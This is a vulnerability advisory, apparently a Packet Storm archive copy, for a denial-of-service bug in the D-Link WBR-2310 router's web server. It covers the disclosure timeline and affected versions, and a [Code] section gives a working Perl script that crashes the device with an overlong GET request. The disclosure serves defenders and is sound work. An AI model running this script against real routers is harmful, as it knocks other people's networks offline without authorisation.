Dlink WBR-2310 Embedded Web Server 1.04 Denial Of Service

2010-08-03T00:00:00
ID PACKETSTORM:92447
Type packetstorm
Reporter ipax
Modified 2010-08-03T00:00:00

Description

                                        
                                            `[DCA-00014]  
  
[Software]  
  
- Dlink WBR-2310 Embedded Web Server  
  
[Vendor Product Description]  
  
- The D-Link RangeBooster G™ WBR-2310 with enhanced 108 features the  
industry’s first default 108Mbps* “Dynamic Mode” that allows clients  
to always operate at the highest possible speeds while automatically  
identifying and recognizing other D-Link RangeBooster G™ products for  
highest performance capability and seamless access to the wireless  
network in a homogeneous environment.  
  
[Bug Description]  
  
- The Embedded Web Server does not sanitize correctly a crafted GET  
request leading to Denial-of-Service.  
  
[History]  
  
- Advisory sent to vendor on 07/20/2010  
- No response from vendor  
- We tried to contact again on 07/30/2010  
- No response from vendor  
- Public advisory & exploit 08/02/2010.  
  
[Impact]  
  
- Low-Medium  
  
[Affected Version]  
  
- Firmware Version: 1.04  
- Hardware Version: A1  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/perl  
use IO::Socket;  
  
if (@ARGV < 1) {  
usage();  
}  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
  
print "[+] Sending request...\n";  
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
print $socket "GET  
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";  
  
sleep(3);  
close($socket);  
  
print "[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 192.168.0.1 80\n";  
exit;  
}  
  
  
[Credits]  
  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
  
  
[Greetz]  
Crash and all Dclabs members.  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`